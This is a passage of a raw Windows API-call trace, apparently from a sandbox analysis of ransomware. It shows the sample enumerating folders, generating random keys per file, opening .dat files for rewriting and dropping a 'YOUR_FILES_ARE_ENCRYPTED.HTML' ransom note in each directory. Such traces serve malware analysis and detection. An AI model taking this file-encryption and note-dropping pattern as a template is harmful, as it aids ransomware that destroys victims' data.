returned 152 [0118.790] GetProcessHeap () returned 0x600000 [0118.790] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.791] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911" [0118.791] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\*" [0118.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77126bb1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x77126bb1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x77126bb1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.792] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77126bb1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x77126bb1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x77126bb1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.792] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77126bb1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x77126bb1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e20e66f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.792] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.792] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\eventbeacons.dat") returned 169 [0118.792] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.792] lstrlenW (lpString=".dat") returned 4 [0118.792] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.792] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202911\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.792] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.793] CloseHandle (hObject=0x338) returned 1 [0118.793] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77126bb1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x77126bb1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2097bf, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.793] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.793] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\imprbeacons.dat") returned 168 [0118.793] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.793] lstrlenW (lpString=".dat") returned 4 [0118.793] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.793] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202911\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.793] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.793] CloseHandle (hObject=0x338) returned 1 [0118.793] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77126bb1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x77126bb1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2097bf, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.793] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.793] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.793] GetProcessHeap () returned 0x600000 [0118.793] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202911\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.796] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.796] CloseHandle (hObject=0x214) returned 1 [0118.797] GetProcessHeap () returned 0x600000 [0118.797] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.797] GetProcessHeap () returned 0x600000 [0118.797] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.797] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77231c7c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xf58dc2a4, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf58dc2a4, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="202914", cAlternateFileName="")) returned 1 [0118.797] StrStrIW (lpFirst="202914", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.797] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914") returned 152 [0118.797] GetProcessHeap () returned 0x600000 [0118.797] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.797] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914" [0118.797] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\*" [0118.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77231c7c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xf58dc2a4, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf58dc2a4, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.797] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77231c7c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xf58dc2a4, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf58dc2a4, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.797] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1bc0725, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf1bc0725, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf1c7f1c3, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0xc80, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1613478815", cAlternateFileName="161347~1")) returned 1 [0118.797] StrStrIW (lpFirst="1613478815", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.797] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\1613478815") returned 163 [0118.797] PathFindExtensionW (pszPath="1613478815") returned="" [0118.797] lstrlenW (lpString="") returned 0 [0118.797] PathFindExtensionW (pszPath="1613478815") returned="" [0118.797] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77231c7c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x77231c7c, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x2e2fda01, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0118.797] StrStrIW (lpFirst="eventbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.797] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\eventbeacons.dat") returned 169 [0118.797] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.797] lstrlenW (lpString=".dat") returned 4 [0118.797] PathFindExtensionW (pszPath="eventbeacons.dat") returned=".dat" [0118.797] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\eventbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\eventbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.798] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.798] CloseHandle (hObject=0x338) returned 1 [0118.798] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77231c7c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xf583fee6, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x2e2f8bad, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0118.798] StrStrIW (lpFirst="imprbeacons.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.798] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\imprbeacons.dat") returned 168 [0118.798] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.798] lstrlenW (lpString=".dat") returned 4 [0118.798] PathFindExtensionW (pszPath="imprbeacons.dat") returned=".dat" [0118.798] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\imprbeacons.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\imprbeacons.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0118.798] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.798] CloseHandle (hObject=0x338) returned 1 [0118.798] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77231c7c, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xf583fee6, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x2e2f8bad, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0118.799] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.799] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0118.799] GetProcessHeap () returned 0x600000 [0118.799] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202914\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\202914\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.799] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.800] CloseHandle (hObject=0x214) returned 1 [0118.800] GetProcessHeap () returned 0x600000 [0118.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.800] GetProcessHeap () returned 0x600000 [0118.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.800] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771bf51a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x2d15de40, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2d15de40, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="209562", cAlternateFileName="")) returned 1 [0118.800] StrStrIW (lpFirst="209562", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.800] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562") returned 152 [0118.800] GetProcessHeap () returned 0x600000 [0118.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.800] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562" [0118.800] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\*" [0118.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771bf51a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x2d15de40, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2d15de40, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.801] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771bf51a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x2d15de40, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2d15de40, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="..", cAlternateFileName="")) returned 1 [0118.801] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1826b35f, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1826b35f, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x18624c83, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x4640, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1613045947", cAlternateFileName="161304~1")) returned 1 [0118.801] StrStrIW (lpFirst="1613045947", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.801] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\1613045947") returned 163 [0118.801] PathFindExtensionW (pszPath="1613045947") returned="" [0118.801] lstrlenW (lpString="") returned 0 [0118.801] PathFindExtensionW (pszPath="1613045947") returned="" [0118.801] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c6e96b9, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2c6ed153, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2c769945, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x46aa, dwReserved0=0x6b4210, dwReserved1=0x6f08f0, cFileName="1614152794", cAlternateFileName="161415~1")) returned 1 [0118.801] StrStrIW (lpFirst="1614152794", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.801] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\209562\\1614152794") returned 163 [0118.801] PathFindExtensionW (pszPath="1614152794") returned="" [0118.801] lstrlenW (lpString="") returned 0 [0118.801] PathFindExtensionW (pszPath="1614152794") returned="" [0118.801] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, 